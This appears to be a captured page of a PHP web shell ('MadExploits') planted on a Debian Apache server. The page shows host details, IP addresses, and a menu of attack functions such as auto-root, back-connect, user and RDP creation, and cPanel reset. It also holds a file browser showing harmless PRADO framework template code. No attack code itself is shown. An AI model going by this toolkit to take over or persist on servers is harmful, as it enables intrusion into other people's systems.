Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.218.3.204
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
framework /
Wsat /
pages /
[ HOME SHELL ]
Name
Size
Permission
Action
layout
[ DIR ]
drwxr-xr-x
TWsatGenerateAR.page
2.77
KB
-rw-r--r--
TWsatGenerateAR.php
2.07
KB
-rw-r--r--
TWsatHome.page
700
B
-rw-r--r--
TWsatHome.php
349
B
-rw-r--r--
TWsatLogin.page
2.34
KB
-rw-r--r--
TWsatLogin.php
897
B
-rw-r--r--
TWsatScaffolding.page
94
B
-rw-r--r--
TWsatScaffolding.php
352
B
-rw-r--r--
config.xml
380
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TWsatGenerateAR.page
<com:TContent ID="Content"> <div style="margin: 10px; font-size: 16px; font-weight: bold">Active Record Classes Generator</div> <div class="green_panel" style="text-align: left; font-size: 14px; margin: 15px 5px"> <label>This generator generates an AR class for the specified database table.</label><br/> <label>Fields with <b style="color: red">*</b> are required.</label> <hr/> <div style="font-size: 12px; font-style: italic"> <ul> <li>If you want to generate all AR Classes, keep the "Table Name" field as appears by default.</li> <li>"Output Folder" field refers to the directory that the new AR class file should be generated under... where Application refers to the protected folder of your project. You can let this default field value and PRADO will create the proper folders for you.</li> </ul> </div> </div> <div style="font-size: 14px"> <div class="form_row"> <com:TLabel Text="Table Name:" ForControl="table_name" style="margin-right: 24px" /> <com:TTextBox ID="table_name" Text="*" CssClass="in_text" /> <label style="color: red">*</label> <com:TRequiredFieldValidator ControlToValidate="table_name" Text="Table name cannot be blank." Display="Dynamic" /> </div> <div class="form_row"> <com:TLabel Text="Output Folder:" ForControl="output_folder" style="margin-right: 8px"/> <com:TTextBox ID="output_folder" Text="Application.App_Data.AR_Classes" CssClass="in_text" /> <label style="color: red">*</label> <com:TRequiredFieldValidator ControlToValidate="output_folder" Text="Output folder cannot be blank." Display="Dynamic" /> </div> <div class="form_row"> <com:TLabel Text="Class Prefix:" ForControl="class_prefix" style="margin-right: 25px"/> <com:TTextBox ID="class_prefix" Text="AR_" CssClass="in_text" /> </div> <div class="form_row"> <com:TLabel Text="Class Suffix:" ForControl="class_suffix" style="margin-right: 27px"/> <com:TTextBox ID="class_suffix" CssClass="in_text" /> </div> <div class="form_row"> <com:TLabel Text="Build Relations:" ForControl="build_rel"/> <com:TCheckBox ID="build_rel" Checked="true" /> </div> <com:TPanel ID="feedback_panel" Visible="false" style="width: 400px"> <com:TLabel ID="generation_msg" /> </com:TPanel> <br/> <div style="text-align: center; width: 400px"> <com:TButton Text="Preview" OnClick="preview" Visible="false" /> <com:TButton Text="Generate" OnClick="generate" /> </div> </div> </com:TContent>
Close